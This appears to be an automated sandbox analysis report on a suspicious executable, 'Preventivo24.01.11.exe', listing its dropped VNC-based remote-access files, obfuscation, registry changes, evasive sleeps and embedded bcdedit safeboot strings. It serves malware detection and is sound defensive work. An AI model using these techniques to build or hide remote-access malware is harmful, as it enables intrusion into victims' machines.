Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Preventivo24.01.11.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Binary contains a suspicious time stamp
Source: shi5398.tmp.0.dr Static PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B20CA0 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_00B20CA0
PE file contains sections with non-standard names
Source: Preventivo24.01.11.exe Static PE information: section name: .didat
Source: ddengine.dll.0.dr Static PE information: section name: .SharedD
Source: shi5398.tmp.0.dr Static PE information: section name: .wpp_sf
Source: shi5398.tmp.0.dr Static PE information: section name: .didat
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508A79 push es; ret 0_3_05508E9A
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05510604 push es; retf 0_3_055106EE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05519828 pushad ; retf 0_3_05519829
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05510893 push es; ret 0_3_05510896
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508EAD push es; retf 0_3_05508EAE
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_05508EAF push es; iretd 0_3_05508EBA
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFF47 push edx; ret 0_3_054EFF59
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFF67 push esi; ret 0_3_054EFF79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F932D pushfd ; retf 0_3_054F9332
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD27 push ds; ret 0_3_054EFD39
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD3A push ss; ret 0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054EFD83 push ss; ret 0_3_054EFD79
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F83A7 push ds; retf 0_3_054F83A8
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F760B push cs; retf 0_3_054F760C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_3_054F841B push ds; retf 0_3_054F841C
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFA4B0 push ecx; mov dword ptr [esp], 3F800000h 0_2_00AFA60F
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BEB2DE push ecx; ret 0_2_00BEB2F1
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_009FFB10 push ecx; mov dword ptr [esp], ecx 0_2_009FFB11
Source: C:\Games\viewer.exe Code function: 7_2_009850CC push ecx; ret 7_2_009850DF
Source: C:\Games\viewer.exe Code function: 7_2_00985676 push ecx; ret 7_2_00985689
Source: C:\Games\taskhost.exe Code function: 42_2_006C6143 push ecx; ret 42_2_006C6156
Source: C:\Games\taskhost.exe Code function: 42_2_005851FF pushad ; iretd 42_2_00585218
Source: C:\Games\taskhost.exe Code function: 42_2_0058E25B pushad ; iretd 42_2_0058E25C
Source: C:\Games\taskhost.exe Code function: 42_2_0058E27D pushad ; iretd 42_2_0058E27E
Source: C:\Games\taskhost.exe Code function: 42_2_0058E275 pushad ; iretd 42_2_0058E276
Source: C:\Games\taskhost.exe Code function: 42_2_0058E263 pushad ; iretd 42_2_0058E264
Source: C:\Games\taskhost.exe Code function: 42_2_00585265 push 60F5C5F1h; iretd 42_2_00585278
Source: C:\Games\taskhost.exe Code function: 42_2_0058E5FB pushad ; iretd 42_2_0058E5FC
Source: C:\Games\taskhost.exe Code function: 42_2_0058C5A6 pushad ; iretd 42_2_0058C5A9
Source: C:\Games\taskhost.exe Code function: 42_2_0058E61D pushad ; iretd 42_2_0058E61E
Source: C:\Games\taskhost.exe Code function: 42_2_0058E615 pushad ; iretd 42_2_0058E616

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe
Drops PE files
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\viewer.exe Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI5406.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\shi5398.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File created: C:\Users\user\AppData\Local\Temp\MSI54A3.tmp Jump to dropped file
May use bcdedit to modify the Windows boot settings
Source: taskhost.exe.0.dr Binary or memory string: bcdedit.exe
Source: taskhost.exe.0.dr Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkWow64DisableWow64FsRedirectionkernel32Wow64RevertWow64FsRedirectionSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilegeRICHED32.DLL------------------------------------------------------------------------------------------------------------------------
Source: C:\Games\taskhost.exe Code function: 42_2_005AAEE0 GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileStructA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 42_2_005AAEE0
Source: C:\Games\taskhost.exe Code function: 42_2_005A7AE0 GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetLastError,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,GetPrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,WritePrivateProfileStringA,wsprintfA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,wsprintfA,WritePrivateProfileStringA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA,GetPrivateProfileIntA, 42_2_005A7AE0
Source: C:\Games\taskhost.exe Code function: 42_2_005B37A0 GetPrivateProfileIntA,EnumDisplaySettingsA,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,GetFileVersionInfoSizeA,GetFileVersionInfoA,VerQueryValueA,VerQueryValueA,VerQueryValueA,CreateDCA,DeleteDC, 42_2_005B37A0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Games\viewer.exe Code function: 7_2_00983D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_00983D28
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Games\viewer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\taskhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Games\viewer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Games\taskhost.exe Code function: 42_2_005A57B0 GetPrivateProfileStringA,WTSGetActiveConsoleSessionId,KiUserCallbackDispatcher,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,CloseHandle, 42_2_005A57B0
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi5398.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI54C4.tmp Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\vnchooks.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to dropped file
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll Jump to dropped file
Found evasive API chain (date check)
Source: C:\Games\taskhost.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Games\viewer.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Games\taskhost.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Found large amount of non-executed APIs
Source: C:\Games\viewer.exe API coverage: 5.1 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\timeout.exe TID: 5280 Thread sleep count: 166 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7864 Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7084 Thread sleep count: 170 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File Volume queried: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A05220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00A05220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1D700 FindFirstFileW,GetLastError,FindClose, 0_2_00B1D700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B68B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B68B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1CDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00B1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B43210 FindFirstFileW,FindClose, 0_2_00B43210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFF570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00AFF570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B53790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53C10 FindFirstFileW,FindClose, 0_2_00B53C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B2BFF0 FindFirstFileW,FindClose,FindClose, 0_2_00B2BFF0
Source: C:\Games\viewer.exe Code function: 7_2_0099BC3B FindFirstFileExW, 7_2_0099BC3B
Source: C:\Games\taskhost.exe Code function: 42_2_0059EC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 42_2_0059EC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B52400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00B52400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00BE7833 VirtualQuery,GetSystemInfo, 0_2_00BE7833
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd Jump to behavior
